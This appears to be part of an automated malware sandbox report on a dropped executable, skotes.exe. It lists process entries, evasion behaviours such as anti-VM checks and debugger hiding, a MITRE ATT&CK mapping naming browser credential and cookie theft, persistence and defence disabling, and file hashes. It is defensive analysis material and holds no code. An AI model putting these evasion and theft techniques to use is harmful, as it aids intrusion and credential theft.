C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3644 -ip 36441⤵PID:3660
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2344 -ip 23441⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1752
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
1.2MB
MD58b4f7239298e93f2841806d179036bdf
SHA12630f502f22c4c159b59c5f7ee60e83bce955e58
SHA256df77eb01486560d41b14c749850c069fbf89b4db236a90792ebd2379204473d9
SHA51292fadda9dd008db85585ef1dd300ddd8d961853e775a2c76e6f7ca2d06ffbd621d816778e90aab4dba2dfaccff085a89b8547ba5e0448d0f9d97966164407250
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
126KB
MD58f3083cfc3f967cdf3c4a25160661046
SHA1d308f3a8307b38e367c981c6330eb2abb982a1e1
SHA25694b9e3b9f0b703b8d1594c93b635374ed041aa91b19f2faf170cb5dcdff3f339
SHA51297d638bf2e213084fb6da310abc1f84da3f1483832672ac3238e59a63ffdb2ec9b249bb6124728d6aea5134b4feb792d3b5d099498248ccf69f8a3156236340d
-
Filesize
2KB
MD5622bf737a997b9a257f15dc3b9ee9da5
SHA16beba023f9c081393b64de079969e948a47be8be
SHA256bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
53KB
MD53337d66209faa998d52d781d0ff2d804
SHA16594b85a70f998f79f43cdf1ca56137997534156
SHA2569b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA5128bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f
-
Filesize
17KB
MD589b45674e74d86d7d03d8c2af99eb46a
SHA1c576d5df99cf05062b04fb7e7665d0bf528fdd80
SHA256a3d59163b208e712ee78ea737f1bd407acdd34d507ab29fc4ee2c5e03c5f1f16
SHA51250fa1daf66031ab7e6c942f9e84822384c68830edd60637057db8b9b956b1ab874e9124735bc180778b1405a587faaa78dabe33b646f8000de21073dc2619f45
-
Filesize
17KB
MD5604a082bb431e361825f99d71f548c70
SHA1ff550d12588a21798d363593ee248390345a0fc2
SHA256d6a866ee79540193ff32619f6af862a627dfda269dd0cd348077c4f1030cedb5
SHA5124d9cafd9743efcd8cf60e89d5d3a3c1b41929ae6d13dbf15614a900608a6b1d936810ae95080fa4038cf235854d782b259ade217e34f17b889fc30ee898e57cc
-
Filesize
17KB
MD5976ae407e1a98bfbc5df04c5c93d7ea1
SHA1c8cfd034ae5b1dfa2741e07e62994223201f0103
SHA25640f77d8c78fea89ea67b9d16896a7af9b7bc7677657812b572cfbab192d8582c
SHA512f384f4648f0bb8d33597ab1bdcabe80fdd4334f452ba020d03df2c95b7843ec2ce8235157355ffe95f8c682dd269e74cb3db1f38208374c5d1f16a67f0a5a1ba
-
Filesize
16KB
MD5f925adc63ca4d1fb1233168102bed0eb
SHA1ee34103217d97fddcc852eaaf2c2b7d0f3e4d88c
SHA25690f3a91d00b3fc9ebd113611aa59fe1de6623def6ec2291e9673f7006f44faf7
SHA512913ccade9c3cb5252a86988fe248b0f81b2f8663a8a37c8cc4cb6cba798e3c56db955677b594d97fff0c92c31f4e275ac02424f7d7a1e60ac40694c21b471da9
-
Filesize
20KB
MD5ec5bca964dfb2d4d3990e20bf48544d1
SHA1b779db38864264424ee313f28f0b4a0064d382e7
SHA256650e99bc39babf5407560607ac384a174e27f8fd4cd87ec46e1a0c332afb1f84
SHA512437ff508c2ea44edbab5a3e916c3719cf4668c8bb41d77026caa9e475cdbd2371b98a2eb6f4f41e237c2525f4ddf57ab7aa699ffb618431a398c5f35054f89a0
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
1.6MB
MD51f61036854821e47b19c4fd069108a1b
SHA1f5c25b026ab98d2f9f11e2939db8812babcc0063
SHA2565682f638317abb65e8d9f88a92a9e00d55c936f0043036141d3d6a7bfb63331a
SHA512fb45d89f71ed8aae6e75a0969679b51eba3599f37e2ea26d4fbbba80fc1d88caa4b679d990dd49e4eb19fd8b7c4c1a1c11dca191cbaea4563f3c5b9b30f1c2d0
-
Filesize
938KB
MD510589c9f302bf5bd52e647ce1f6978cc
SHA171a3864b2a8e232744e825b9ead9f78fdb8e31aa
SHA25634038bb6c0b1a90d5520c1d8572328394c8d3135db165cf8bd0068c61fe57674
SHA5121be77894cc4af041e6cce18c1f1b1f6f93f843672aa1464fc5aba87739e92805c17ae7c18c933c17442acf96dbd25d52831c47d95ba6498a4f588a20f19f4d85
-
Filesize
2KB
MD5189e4eefd73896e80f64b8ef8f73fef0
SHA1efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74
-
Filesize
404KB
MD5ee72c55264dcaa01e77b2b641941a077
SHA1e79b87c90977098eef20a4ae49c87eb73cf3ea23
SHA2564470809cd7fa85c0f027a97bf4c59800331d84c4fc08e88b790df3fbf55042ed
SHA512baaa08d488b9e03176ff333b016d6fc8576d22be3d3b83ff4f46328802e2d8d1e40d4518884287124d6771df4d7d4260513c2c73c373b00973d6a1beb55c6fcc
-
Filesize
728KB
MD5911e84caf2003fa338e75c94c0a13fa4
SHA1f8a7dfb45c7e1c0561e03e68d36978ac64e99a70
SHA256f79d90d5342f51c84ce5700a388c04b7ca08ece2e05b079cb4641d45f6594e2b
SHA512b07a561866b1b16ee21069c594175e8049522d01a0779423dc451b28ef2459d33cc468d9944528cb89f4e7a008239ae5ed6adc76aaa3c2f73463c42df87b25c1
-
Filesize
325KB
MD5f071beebff0bcff843395dc61a8d53c8
SHA182444a2bba58b07cb8e74a28b4b0f715500749b2
SHA2560d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA5121ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d
-
Filesize
224KB
MD56b6815c9d379c1dffbd760a91b3a9698
SHA132372e3d0672d94158eb8f06fe49f4078a40a104
SHA2565c0183e129bf6310591ebb6446679747ad8b4c597e3058654b6bc73ee359ba9d
SHA5125e1efffaf95d78be4ff6a1f1b3d468a41e00a03d51ea4cdcbc94fcf1dba914b427a27b607a4f40cba931a927a3402352a70ab95274a073f94557965f81497881
-
Filesize
880KB
MD51c611166768934709414e86420907d9e
SHA16f2d29019332f417f2c36e09adc68dade71fa71a
SHA25618cb8d4b430b8c6f45e050534e73d8c914f1e0be92a33270b87796f5bd217205
SHA512be1c3a69440f2c7d2aacae4449f92888c427daec3420a56554daeea30e0750bb048fa95ce4c3b1dd4eb56abfd3a52862f7106f361a8b91eb9c1aa6350bd78d45
-
Filesize
1.7MB
MD50f2e0a4daa819b94536f513d8bb3bfe2
SHA14f73cec6761d425000a5586a7325378148d67861
SHA2568afc16be658f69754cc0654864ffed46c97a7558db0c39e0f2d5b870c1ff6e39
SHA51280a35414c2be58deec0f3382a8e949a979f67d4f02c2700cf0da4b857cdcc8daa6b00ce2bcc3864edb87446086fe3f547a60580449935dbad5fb5f08dda69f1b
-
Filesize
276KB
MD508470c644b61ed4b473020eb6c455908
SHA1737ac06d28a5c7760a1407b9b0cb7113030ce4b7
SHA256be0d150d8ba2b3d607c23fac6aff6caf97525565f392e9daf3dd1baaabfcf447
SHA51234dfd41389562fa23a306c0c2d8a9173e216966e751454dfe026ce1b21159e499b1dec92e71079b32c7ca4c2c8aa87355a7d6c439e9814a94823d4071233b302
-
Filesize
2.1MB
MD5581073aad7a20307a9d8b1ae25591204
SHA17a480497dcbf5a778a67a570507296190879d231
SHA25610f74f3eb9a3efa714be7afa4503c6655f6502d3891497b96ce4418e0017f0f9
SHA5120c9fee13c7723ba09449cbec55b88898ece66a53481250d84bd137cf8c972f5a2b3755bedf428595c43077d62fc3377626ee266c432988751f1f056c924d62ab
-
Filesize
1.7MB
MD5ead2e5cc0e7c59f019eb25abddf4930c
SHA1d777662ffa17a2a32df335dc19c23223c3bfda9f
SHA2569229327eca624e2659e3bc4d74531926510f08b96142bb96fc5017a690761799
SHA512b1727027941f08bcc053d07179074a0c5de53925a936f3c0bb24ed5ef6d7a265e9b42498f4f3ceb749c3e096043196d8e348cf0cb5c5c3d18df6fa39530bafa2
-
Filesize
1.7MB
MD5f457af464c54aa2097bdedc459abd266
SHA101ebb59e4ff33ae2948522d5044f00c0c6a13bef
SHA256ff34e13e63efb7df445b92003447ff4689281ec83626594633dc8b61bcb9626a
SHA5123da5c916d3262bcdb29442daf625ea1483e38384e2d9ad83cae9694de4c9da9732e8da2068743d4698d135790088514a5c80235b7002f509556d873938bcc4e8
-
Filesize
3.7MB
MD5fa127f6bb77844032decb98564b7489f
SHA1da6e4633e8395dce3f5c841f51ede8792eafc71d
SHA2560304572f5f48606cced6b334675e8827b7da2dc4575e3034147c7c16797f2e20
SHA5129130e86ffdd2f30237537b4940d3d2c9d399aa86d0399ec470719a95fc0c0fa27a7b470e70f5095d46f774138a0324cffc5a16ecd6afdba261b3562fe0dcaf42
-
Filesize
2.0MB
MD54337cb18d6ef4061769d2645ceb0a90f
SHA1262ab69209f45a070c9ab405845835a7624dc49b
SHA25671397fc8ae19b7c0cfa91fb6a1a8829ab14e099818b66fd9bf98839c37027854
SHA512b3b7814922e4bc4efdcc776f02e5c0ad11b341be8e6e656d6d0a8e8b4aa3b1e7cf36968bc4611f23890aabe9f013ffbf2c4391f7b506b0294a245595a8423b14
-
Filesize
1.8MB
MD5f5d1338542eaeccb8e0eca97b9b00dc3
SHA10a46bf4971a0899aa7da73975394eff5551c7e5c
SHA256e44b30bc027f8b379e81128c902c3098940e8f6eaf24439d719a894a361f42d0
SHA51234bc4f7a24aebf23bf0f3ead35e61ec7b9e8a671cf9a66b307b537dc430a0d81b70e685f04fda1f46ffbdc9a490228d79122c0fdfd214f1c5da09a544333be84
-
Filesize
2.1MB
MD5557209a546178291f5118d320c5ed5fb
SHA17744868563ee724d1c55ad98011df375bafe4c05
SHA256670a3985c548e0bf2e1b97591ba9c389c8d879e761eb86d68b6e3426cfd55816
SHA512258e18efdce0c47a369cedcfcde73ecad5e1d412a2d61b6b76b2bb18caee000b10049f0001fcc584d2ead09647e701821bd9b06e74b1950e5f6f5c6ec3b98841
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
726B
MD58475ef1b1cedddfadc7d1f9964d919f5
SHA1dd9f413206be8f021b52afb74f627491d8743369
SHA25645b6a79c1076a34a3e2c82c210ee7af4a305c581c337dbab104fd134de5619db
SHA5128450af12284ab9a7b19076a4a3da2338db62d5cf19c10a0f642f6655dbb7b11dbd27c78bfb3d737ebc9d522f23fe0fc39ed96ed4a8e43dc78e0f48f3829c1eab
-
Filesize
330KB
MD5685fb118c357497e779efb8a586d8407
SHA1bbb8cf75a140f43720e1db831bad3e2db09e4ff7
SHA256a335b31be9707d1960e67b6ac6e13598d05eb4d924c45cd6a16daec275c3f1ae
SHA512feec56c01e68aaad374f58ce2333ea83820f8576e743d1c7a6efcbad984adb6133463f52c9169eda1ca2593702fb14cc1b7e596c5e72384418419712cf1e74b8